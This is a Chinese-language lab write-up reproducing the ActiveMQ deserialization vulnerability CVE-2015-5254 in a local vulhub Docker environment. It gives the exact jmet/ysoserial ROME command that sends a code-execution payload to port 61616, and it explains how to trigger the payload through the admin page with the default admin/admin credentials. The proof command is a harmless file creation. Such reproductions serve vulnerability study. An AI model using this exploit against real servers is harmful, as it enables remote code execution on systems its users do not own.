ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

1.运行漏洞环境

sudo docker-compose up -d

ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第1张图片

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第2张图片

2.漏洞复现

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第3张图片
因为我就是在本地测试的,ip就填的127.0.0.1
此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:(密码默认为admin/admin)
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第4张图片
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第5张图片

点击查看新建的消息即可触发命令执行,此时进入容器docker-compose exec activemq bash,可见/tmp/success已成功创建,说明漏洞利用成功:
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第6张图片

3.参考

https://vulhub.org/#/docs/download-vulhub/
https://www.cnblogs.com/backlion/p/9970516.html

你可能感兴趣的:(ActiveMQ 反序列化漏洞(CVE-2015-5254)复现)